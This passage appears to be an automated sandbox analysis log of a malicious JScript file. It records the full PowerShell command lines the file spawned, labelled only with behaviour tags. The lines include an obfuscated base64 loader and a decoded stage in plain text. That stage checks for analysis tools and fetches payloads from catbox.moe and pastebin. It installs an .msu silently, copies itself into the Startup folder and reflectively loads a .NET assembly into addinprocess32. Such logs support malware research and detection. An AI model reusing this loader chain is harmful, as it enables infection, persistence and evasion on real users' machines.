'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'iAGoAcA' + [char]66 + 'tAGwAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAYg' + [char]66 + 'qAHAAbQ' + [char]66 + 'sACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XADsAIAAkAHAAUA' + [char]66 + 'DAGwAVwAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATw' + [char]66 + 'DAEoATA' + [char]66 + 'TACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAEkAeg' + [char]66 + 'qAHYAZAAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQASQ' + [char]66 + '' + [char]66 + 'AHkAWQ' + [char]66 + 'wACAAPQAgACQAbA' + [char]66 + 'tAEkATw' + [char]66 + 'hAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQASQ' + [char]66 + '6AGoAdg' + [char]66 + 'kACAAKQAgADsAJA' + [char]66 + 'WAGcAdg' + [char]66 + 'LAGEAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'JAEEAeQ' + [char]66 + 'ZAHAAKQA7ACQAVg' + [char]66 + 'nAHYASw' + [char]66 + 'hACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'PAEMASg' + [char]66 + 'MAFMAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATw' + [char]66 + 'NAEcAeA' + [char]66 + 'FACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lAEoATA' + [char]66 + 'ZAHgAZg' + [char]66 + 'GAHEALw' + [char]66 + '3AGEAcgAvAG0Abw' + [char]66 + 'jAC4Abg' + [char]66 + 'pAGIAZQ' + [char]66 + '0AHMAYQ' + [char]66 + 'wAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQAYwA6AFwAdw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAG0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AC4Abg' + [char]66 + 'lAHQAXA' + [char]66 + 'mAHIAYQ' + [char]66 + 'tAGUAdw' + [char]66 + 'vAHIAaw' + [char]66 + 'cAHYANAAuADAALgAzADAAMwAxADkAXA' + [char]66 + 'hAGQAZA' + [char]66 + 'pAG4AcA' + [char]66 + 'yAG8AYw' + [char]66 + 'lAHMAcwAzADIAJwAnACAAKQAgACkAOwAnADsAJA' + [char]66 + 'wAEwAbA' + [char]66 + 'VAE8AIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAOw' + [char]66 + '9ADsA';$SUopR = $SUopR.replace('革','B') ;$SUopR = [System.Convert]::FromBase64String( $SUopR ) ;;;$SUopR = [System.Text.Encoding]::Unicode.GetString( $SUopR ) ;$SUopR = $SUopR.replace('%DCPJU%','C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js') ;powershell $SUopR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qNSnG = $host.Version.Major.Equals(2);If ( $qNSnG ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$fcyzy = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$KhLaK = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $KhLaK ) {$fcyzy = $menos ;}else {$fcyzy = ($fcyzy) ;};$tzxdf = ( New-Object Net.WebClient ) ;$tzxdf.Encoding = [System.Text.Encoding]::UTF8 ;$tzxdf.DownloadFile($fcyzy, ($fbKNY + '\Upwin.msu') ) ;$rHWrT = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js' -Destination ( $rHWrT + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$bjpml = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$pPClW = $webClient.DownloadString( $bjpml ) ;$Stringbase = $pPClW; $pPClW = BaseMy;$pPClW | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$OCJLS = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$lmIOa = New-Object System.Net.WebClient ;$lmIOa.Encoding = [System.Text.Encoding]::UTF8 ;$Izjvd = ( Get-Content -Path $cZNqf ) ;$IAyYp = $lmIOa.DownloadData( $Izjvd ) ;$VgvKa = [System.Text.Encoding]::UTF8.GetString($IAyYp);$VgvKa | Out-File -FilePath $OCJLS -force ;$OMGxE = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$OMGxE += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$OMGxE += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$OMGxE += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$OMGxE += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''eJLYxfFq/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$pLlUO = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$OMGxE | Out-File -FilePath $pLlUO -force ;powershell -ExecutionPolicy Bypass -File $pLlUO ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4708

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js"
1⤵
- Checks computer location settings
PID:3800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SUopR = 'JA' + [char]66 + 'xAE4AUw' + [char]66 + 'uAEcAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'OAFMAbg' + [char]66 + 'HACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAApACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAoACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACkAIAA7AH0AOwAkAHQAeg' + [char]66 + '4AGQAZgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'mAGMAeQ' + [char]66 + '6AHkALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 